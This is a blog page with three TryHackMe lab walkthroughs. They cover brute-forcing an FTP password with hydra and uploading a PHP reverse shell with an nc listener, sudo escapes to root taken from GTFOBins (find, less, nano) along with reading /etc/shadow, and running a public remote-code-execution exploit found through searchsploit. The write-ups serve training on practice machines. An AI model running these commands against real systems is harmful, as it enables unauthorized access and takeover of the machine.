Showing posts with label jr.penetration tester. Show all posts
Showing posts with label jr.penetration tester. Show all posts

Tuesday, March 22, 2022

TryHackMe - h4cked - walkthrough

H4cked is one of easy room on the TryHackMe.com In task 1 we are faced by pcap file of the attack on the VM. Most of the answers in Task 1 are found from pcap file which you open with wireshark. Task 2 in this task you try to regain access to the VM same way as hacker did in task 1.
  1. Step

    2. We use hydra to crack new password with following command

    hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://target_IP

  2. Step

    3. We log to the ftp and download the shell.php (get shell.php - is the command) and change IP and port to our attack box and upload it back (put shell.php)
  3. Step
    4. Before move to the starting the php script we need to start nc listener on attacking box with

    nc -lvnp port_number

  4. Step
    5. Now we are ready to start php script shell.php from browser:

    IP_target_machine/shell.php

  5. Step
    6. We get spawned reverse shell in terminal, with whoami command we check which user we have, then we can use

    su jenny

    and log in with pass we cracked before with hydra
  6. Step
    7. After that we can use

    sudo su

    and we have root access with this we can read root flag.
I hope someone stucked in any step of solving this room finds this walkthrough useful.
at No comments:
Labels: , , , , , , , , , , , ,

Saturday, February 19, 2022

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.
  • Find

    • sudo find . -exec /bin/sh \; -quit

  • Less

    • sudo less /etc/profile
    !/bin/sh

  • nano

    • sudo nano
    ^R^X
    reset; sh 1>&0 2>&0


Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.
at No comments:
Labels: , , , , , , , , , , , ,

Sunday, January 30, 2022

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is online platform for learning cyber security, using hands-on exercises and labs.
This post refers to the Task 5 - Practical: Manual Explotaition which is part of the module of Exploit Vulnerabilities on THM JR penetration tester course.
Task 5 is final task in this submodule and is to show practical example of things you learned through the previous tasks.

First step is to start VM that you will try to exploit as description says it requires few minutes to boot up. If you will use Attackbox on their site don't forget to start it also.

Second step To answer the Q1 you need to just open website that is hosted on VM you started in first step. Scroll down to the bottom of the page and voila you will find name version of the website.

Third step Now that you know website version you will need to find the way to exploit and gain access to it. You could also online tools but this Task 5 one aims towards use of the searchsploit tool that is installed and ready to use in Attackbox machine. we use following command:

searchsploit online book store

We get 4 different results, but we choose last from the list wich offers remote code execution.


Forth step - To start exploit you will use following command:

python name_of_script.py VM_IP

Since I was not in the same directory as exploit script I got error that exploit script was not found, so I used:

locate 47887.py

With that I found correct location of the exploit script and then i could ran exploit script correctly without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with exploit and in matter of seconds you get access to the shell of the VM.

Fifth step - finding flag.txt file and answer to the Q3 of this task.
This did not require much of the search since file is located in current folder and I used

cat flag.txt

To display flag.txt file content. I hope that this post is helpful for anyone trying to solve this challenge. audittrsi
at No comments:
Labels: , , , , , , , , ,
Subscribe to: Comments (Atom)

TryHackMe - Shadow Trace Writeup

 Shadow Trace is premium room on TryHackMe.com part of the SOC Level 1 Path. We need to analyse a suspicious file, uncover hidden clues, an...